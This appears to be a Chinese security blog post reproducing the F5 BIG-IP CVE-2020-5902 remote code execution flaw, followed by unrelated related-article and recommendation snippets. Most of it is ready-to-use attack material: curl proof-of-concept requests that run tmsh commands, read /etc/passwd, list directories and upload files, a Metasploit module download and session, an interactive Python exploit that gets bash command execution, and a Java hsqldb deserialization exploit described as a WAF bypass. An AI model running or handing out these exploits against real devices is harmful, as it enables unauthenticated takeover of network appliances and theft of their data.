CVE-2020-5902 F5 BIG-IP 远程代码执行漏洞复现

漏洞介绍

F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。

近日,F5官方公布流量管理用户界面(TMUI)使用程序的特定页面中存在一处远程代码执行漏洞(CVE-2020-5902)

影响版本

BIG-IP 15.x: 15.1.0/15.0.0

BIG-IP 14.x: 14.1.0 ~ 14.1.2

BIG-IP 13.x: 13.1.0 ~ 13.1.3

BIG-IP 12.x: 12.1.0 ~ 12.1.5

BIG-IP 11.x: 11.6.1 ~ 11.6.5

poc

https://twitter.com/x4ce/status/1279790599793545216

RCE:

curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

Read File:

curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'


GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Cookie: JSESSIONID=A5AC072B883CB89A7FC015516ACB793C

Upgrade-Insecure-Requests: 1

DNT: 1

Cache-Control: max-age=0

List File

curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/'


GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Cookie: JSESSIONID=A5AC072B883CB89A7FC015516ACB793C

Upgrade-Insecure-Requests: 1

DNT: 1

Cache-Control: max-age=0

Upload File

Example: /tmui/locallb/workspace/fileSave.jsp

POST: fileName=/tmp/2333.txt&content=test

POST /tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 39

fileName=/tmp/2333.txt&content=test

HTTP/1.1 200 OK

Date: Wed, 08 Jul 2020 12:06:04 GMT

X-Frame-Options: SAMEORIGIN

Strict-Transport-Security: max-age=16070400; includeSubDomains

Set-Cookie: JSESSIONID=F4430C6A7479E77F59DF6CE710C8BF3D; Path=/tmui; Secure; HttpOnly

Content-Type: text/html; charset=ISO-8859-1

X-Content-Type-Options: nosniff

X-XSS-Protection: 1; mode=block

Content-Security-Policy: default-src 'self'  'unsafe-inline' 'unsafe-eval'; img-src 'self'  http://127.4.1.1 http://127.4.2.1

Vary: Accept-Encoding

Content-Length: 4

Connection: close

File Read /tmp/2333.txt

GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/tmp/2333.txt HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Content-Length: 2

HTTP/1.1 200 OK

Date: Wed, 08 Jul 2020 12:11:29 GMT

X-Frame-Options: SAMEORIGIN

Strict-Transport-Security: max-age=16070400; includeSubDomains

Set-Cookie: JSESSIONID=3FDC814B93AE8F030236DAE60E67F47E; Path=/tmui; Secure; HttpOnly

Content-Type: text/html; charset=ISO-8859-1

X-Content-Type-Options: nosniff

X-XSS-Protection: 1; mode=block

Content-Security-Policy: default-src 'self'  'unsafe-inline' 'unsafe-eval'; img-src 'self'  http://127.4.1.1 http://127.4.2.1

Vary: Accept-Encoding

Content-Length: 27

Connection: close

{"output":"test\n\n\n"}

MSF f5_bigip_tmui_rce

https://github.com/rapid7/metasploit-framework/blob/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb

msf use

wget -P /usr/share/metasploit-framework/modules/exploits/linux/http/ https://raw.githubusercontent.com/rapid7/metasploit-framework/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb

reload_all

exploit/linux/http/f5_bigip_tmui_rce            2020-06-30       excellent  Yes    F5 BIG-IP TM


root@kali:~/Desktop# msfdb init && msfconsole -q

[i] Database already started

[i] The database appears to be already configured, skipping initialization

msf5 > exit

root@kali:~/Desktop# msfdb init && msfconsole -q

[i] Database already started

[i] The database appears to be already configured, skipping initialization

msf5 > reload_all

[*] Reloading modules from all module paths...

                 _---------.

             .' #######   ;."

  .---,.    ;@             @@`;   .---,..

." @@@@@'.,'@@            @@@@@',.'@@@@ ".

'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;

   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'

     "--'.@@@  -.@        @ ,'-   .'--"

          ".@' ; @       @ `.  ;'

            |@@@@ @@@     @    .

             ' @@@ @@   @@    ,

              `.@@@@    @@   .

                ',@@     @   ;           _____________

                 (   3 C    )     /|___ / Metasploit! \

                 ;@'. __*__,."    \|--- \_____________/

                  '(.,...."/                                                                         

       =[ metasploit v5.0.95-dev                          ]

+ -- --=[ 2040 exploits - 1103 auxiliary - 344 post       ]

+ -- --=[ 566 payloads - 45 encoders - 10 nops            ]

+ -- --=[ 7 evasion                                       ]

Metasploit tip: View advanced module options with advanced

msf5 > search f5_bigip

Matching Modules

================

   #  Name                                            Disclosure Date  Rank       Check  Description

   -  ----                                            ---------------  ----       -----  -----------

   0  auxiliary/dos/http/f5_bigip_apm_max_sessions                     normal     No     F5 BigIP Access Policy Manager Session Exhaustion Denial of Service

   1  auxiliary/gather/f5_bigip_cookie_disclosure                      normal     No     F5 BigIP Backend Cookie Disclosure

   2  auxiliary/scanner/http/f5_bigip_virtual_server                   normal     No     F5 BigIP HTTP Virtual Server Scanner

   3  exploit/linux/http/f5_bigip_tmui_rce            2020-06-30       excellent  Yes    F5 BIG-IP TMUI Directory Traversal and File Upload RCE

   4  exploit/linux/ssh/f5_bigip_known_privkey        2012-06-11       excellent  No     F5 BIG-IP SSH Private Key Exposure

tmshCmd.jsp + fileSave.jsp = Linux RCE

1. tmshCmd.jsp?command=create+cli+alias+private+list+command+bash

2. fileSave.jsp?fileName=/tmp/cmd&content=id

3. tmshCmd.jsp?command=list+/tmp/cmd

4. tmshCmd.jsp?command=delete+cli+alias+private+list

原文地址:

https://twitter.com/x4ce/status/1279790599793545216

cve-2020-5902 RCE 绕过方式

通过bash执行命令的 payload

#coding:utf-8

import requests

import json

import requests.packages.urllib3

requests.packages.urllib3.disable_warnings()

import uuid

import sys

# tmshCmd.jsp?command=create+cli+alias+private+list+command+bash

# fileSave.jsp?fileName=/tmp/cmd&content=id

# tmshCmd.jsp?command=list+/tmp/cmd

# tmshCmd.jsp?command=delete+cli+alias+private+list

banner = r'''

 _______  _______    ______  _________ _______   _________ _______    _______  _______  _______

(  ____ \(  ____ \  (  ___ \ \__   __/(  ____ \  \__   __/(  ____ )  (  ____ )(  ____ \(  ____ \

| (    \/| (    \/  | (   ) )   ) (   | (    \/     ) (   | (    )|  | (    )|| (    \/| (    \/

| (__    | (____    | (__/ /    | |   | |           | |   | (____)|  | (____)|| |      | (__

|  __)   (_____ \   |  __ (     | |   | | ____      | |   |  _____)  |     __)| |      |  __)

| (            ) )  | (  \ \    | |   | | \_  )     | |   | (        | (\ (   | |      | (

| )      /\____) )  | )___) )___) (___| (___) |  ___) (___| )        | ) \ \__| (____/\| (____/\

|/       \______/   |/ \___/ \_______/(_______)  \_______/|/         |/   \__/(_______/(_______/

                        CVE-2020-5902 UnAuth RCE Vuln

                            Python By Jas502n

From: https://github.com/rapid7/metasploit-framework/blob/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb

____________________________________________________________________________________________________________________________________________________

'''

def tmshCmd_exit(url,file,cmd):

    tmshCmd_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash"

    proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}

    r = requests.get(tmshCmd_url,verify=False,allow_redirects=False)

    # r = requests.get(tmshCmd_url,verify=False,allow_redirects=False,proxies=proxies)

    response_str = json.dumps(r.headers.__dict__['_store'])

    # print type(response_str)

    # print response_str

    if r.status_code == 200 and 'tmui' in response_str:

        # print tmshCmd_url

        print "[+] tmshCmd.jsp Exit!"

        print "[+] create cli alias private list command bash \n"

        # cmd = 'whoami'

        upload_exit(url,file,cmd)

    else:

        print "[+] tmshCmd.jsp No Exit!\n"

def upload_exit(url,file,cmd):

    fileSave_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/%s&content="%file + cmd

    proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}

    r = requests.get(fileSave_url,verify=False,allow_redirects=False)

    # r = requests.get(fileSave_url,verify=False,allow_redirects=False,proxies=proxies)

    response_str = json.dumps(r.headers.__dict__['_store'])

    if r.status_code == 200 and 'tmui' in response_str:

        # print fileSave_url

        print "[+] fileSave.jsp Exit!\n"

        list_command(url,file)

    else:

        print "[+] fileSave.jsp No Exit!\n"

def list_command(url,file):

    rce_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/%s" % file

    proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}

    r = requests.get(rce_url,verify=False,allow_redirects=False)

    # r = requests.get(rce_url,verify=False,allow_redirects=False,proxies=proxies)

    response_str = json.dumps(r.headers.__dict__['_store'])

    # print len(r.content)

    if r.status_code == 200 and 'tmui' in response_str:

        if len(r.content) > 33:

            # print rce_url

            print "[+] Command Successfull !\n"

            command_result = json.loads(r.content)

            print "_"*90,'\n\n'

            print command_result['output']

            print "_"*90,"\n\n"

            delete_list(url)

    else:

        print "[+] Command Failed !\n"

def delete_list(url):

    delete_url = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list'

    proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}

    r = requests.get(delete_url,verify=False,allow_redirects=False)

    # r = requests.get(delete_url,verify=False,allow_redirects=False,proxies=proxies)

    response_str = json.dumps(r.headers.__dict__['_store'])

    if r.status_code == 200 and 'tmui' in response_str:

        # print delete_url

        print "[+] delete cli alias private list Successfull! \n"

    else:

        print "[+] delete cli alias private list Failed! \n"

if __name__ == '__main__':

    print banner

    while 1:

        url = "https://x.x.x.x/"

        # url = sys.argv[1]

        file = str(uuid.uuid1())

        print "/tmp/" + file,"\n"

        cmd = raw_input("[+]Set Cmd= ")

        print

        tmshCmd_exit(url,file,cmd)

通过java反序列化绕过waf的payload

/*

 Exploit Title: F5 BIG-IP Remote Code Execution

 Date: 2020-07-06

 Authors: Charles Dardaman of Critical Start, TeamARES

                  Rich Mirch of Critical Start, TeamARES

 CVE: CVE-2020-5902

 Requirements:

   Java JDK

   hsqldb.jar 1.8

   ysoserial https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar

*/

import java.sql.Connection;

import java.sql.DriverManager;

import java.sql.Statement;

import java.nio.file.Files;

import java.nio.file.Paths;

import java.io.IOException;

import org.hsqldb.lib.StringConverter;

public class f5RCE {

	public static void main(String[] args) {

		Connection connection;

		Statement statement;

		if(args.length != 2) {

			System.err.println("\nUsage: <hostname> <payload.txt>\n");

			System.exit(1);

		}

		String server = args[0];

		String pfile = args[1];

		String payload = null;

		try {

			payload = new String(Files.readAllBytes(Paths.get(pfile)));

			payload = payload.replaceAll("(\\n|\\r)","");

		} catch (IOException e) {

			e.printStackTrace();

		}

		String dburl = "jdbc:hsqldb:https://" + server +

                               ":443/tmui/login.jsp/..%3b/hsqldb/";

		System.out.println("Connecting to " + server);

		try {

			Class.forName("org.hsqldb.jdbcDriver");

			connection = DriverManager.getConnection(dburl, "sa","");

			statement = connection.createStatement();

			statement.execute("call \"java.lang.System.setProperty\"('org.apache.commons.collections.enableUnsafeSerialization','true')");

			statement.execute("call \"org.hsqldb.util.ScriptTool.main\"('" + payload +"');");

		} catch (java.sql.SQLException sqle) {

			// ignore java.sql.SQLException: S1000

			// General error java.lang.IllegalArgumentException: argument type mismatch

			if(sqle.getSQLState().equals("S1000") && sqle.getErrorCode() == 40) {

				System.out.println("Payload executed");

			} else {

				System.out.println("Unexpected SQL error");

				sqle.printStackTrace();

			}

			return;

		}

		catch (ClassNotFoundException cne) {

			System.err.println("Error loading db driver");

			cne.printStackTrace();

			return;

		}

	}

}

参考链接

1、https://twitter.com/x4ce/status/1279790599793545216

2、https://github.com/jas502n/CVE-2020-5902/

3、https://github.com/Critical-Start/Team-Ares/tree/master/CVE-2020-5902

CVE-2020-5902 F5 BIG-IP 远程代码执行漏洞的更多相关文章

  1. F5 BIG-IP 远程代码执行漏洞环境搭建

    最近F5设备里的远程代码执行漏洞可谓是火爆,漏洞评分10分,所以,我也想搭建下环境复现一下该漏洞 漏洞详情 F5 BIG-IP 是美国F5公司一款集成流量管理.DNS.出入站规则.web应用防火墙.w ...

  2. Apache Struts 远程代码执行漏洞(CVE-2013-4316)

    漏洞版本: Apache Group Struts < 2.3.15.2 漏洞描述: BUGTRAQ ID: 62587 CVE(CAN) ID: CVE-2013-4316 Struts2 是 ...

  3. MongoDB ‘conn’Mongo 对象远程代码执行漏洞

    漏洞名称: MongoDB ‘conn’Mongo 对象远程代码执行漏洞 CNNVD编号: CNNVD-201307-497 发布时间: 2013-07-25 更新时间: 2013-07-25 危害等 ...

  4. Struts2再爆远程代码执行漏洞

    Struts又爆远程代码执行漏洞!在这次的漏洞中,攻击者可以通过操纵参数远程执行恶意代码.Struts 2.3.15.1之前的版本,参数action的值redirect以及redirectAction ...

  5. 【漏洞公告】CVE-2017-12615/CVE-2017-12616:Tomcat信息泄漏和远程代码执行漏洞

    2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,该漏洞受影响版本为7.0-7.80之间,在一定 ...

  6. PHPMailer < 5.2.18 远程代码执行漏洞(CVE-2016-10033)

    PHPMailer < 5.2.18 Remote Code Execution 本文将简单展示一下PHPMailer远程代码执行漏洞(CVE-2016-10033)的利用过程,使用的是别人已经 ...

  7. 隐藏17年的Office远程代码执行漏洞(CVE-2017-11882)

    Preface 这几天关于Office的一个远程代码执行漏洞很流行,昨天也有朋友发了相关信息,于是想复现一下看看,复现过程也比较简单,主要是简单记录下. 利用脚本Github传送地址 ,后面的参考链接 ...

  8. phpcms2008远程代码执行漏洞

    phpcms2008远程代码执行漏洞 描述: 近日,互联网爆出PHPCMS2008代码注入漏洞(CVE-2018-19127).攻击者利用该漏洞,可在未授权的情况下实现对网站文件的写入.该漏洞危害程度 ...

  9. [转帖]Windows DHCPServer远程代码执行漏洞分析(CVE-2019-0626)

    Windows DHCPServer远程代码执行漏洞分析(CVE-2019-0626) ADLab2019-03-15共23605人围观 ,发现 4 个不明物体安全报告漏洞 https://www.f ...

随机推荐

  1. 离职冷静期文件.doc

    <中华人民共和国民法典>通过十三届全国人大三次会议表决,将于2021年1月1日起施行,其中#离婚冷静期#备受关注.多方人士表示,离婚冷静期设立的出发点,不是对婚姻自由的一种破坏,而是让当事 ...

  2. VMWare 安装CentOS7 时启动黑屏

    针对这个问题找了好久解决方案,发现网络上的都没啥用. 首先根据网络上的文章,查看cpu虚拟化设置.清空网络设置等等... 都没什么效果. 经过一段时间排查发现问题根源: win10系统下,启动 vmw ...

  3. [转] Linux下用文件IO的方式操作GPIO(/sys/class/gpio)

    点击阅读原文 一.概述 通过 sysfs 方式控制 GPIO,先访问 /sys/class/gpio 目录,向 export 文件写入 GPIO 编号,使得该 GPIO 的操作接口从内核空间暴露到用户 ...

  4. java 拦截器解决xss攻击

    一.xss攻击 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序.这些恶意网页程序通常是JavaScript,但实际上也 ...

  5. UltraEdit常用技巧

    Tip 1: Alt+C 列模式可以说最初选择使用这个文本编辑软件,原因很简单,就是因为“她”具有列编辑模式.如果您还不知道什么是列编辑模式的话,我想您应该好好研究一下啦.这是一个超级“赞”的功能.在 ...

  6. cb22a_c++_标准模板库_STL_map_multimap红黑树(数据结构)关联容器

    cb22a_c++_标准模板库_STL_map_multimap红黑树(数据结构)关联容器map(映射,key不能重复,一对一对的,value_type(1, "one")),mu ...

  7. VUE+ELEMENT-UI的后台项目封装组件--查询form的封装

    最近项目打算重构,项目的模块几乎都是以后台查询展示的传统的增删改差模式,所以卑微的我想要自己封装一下查询form,先上效果图 子组件页面: <template> <div class ...

  8. Jmeter服务器监控技术

    meter-plugins.org推出了全新的Plugins Manager,对于其提供的插件进行了集中的管理, 将 ServerAgent-xxx.jar上传被测服务器解压 进入目录 ServerA ...

  9. 三文搞懂学会Docker容器技术(下)

    接着上面一篇:三文搞懂学会Docker容器技术(上) 三文搞懂学会Docker容器技术(中) 7,Docker容器目录挂载 7.1 简介 容器目录挂载: 我们可以在创建容器的时候,将宿主机的目录与容器 ...

  10. 第一章:开始启程-你的第一行Android代码

    Android 系统为开发者提供了什么? 四大组件 活动(Activity):界面 服务(Service):后台默默运行 广播接收器(Broadcast Receiver):接收.发送广播消息 内容提 ...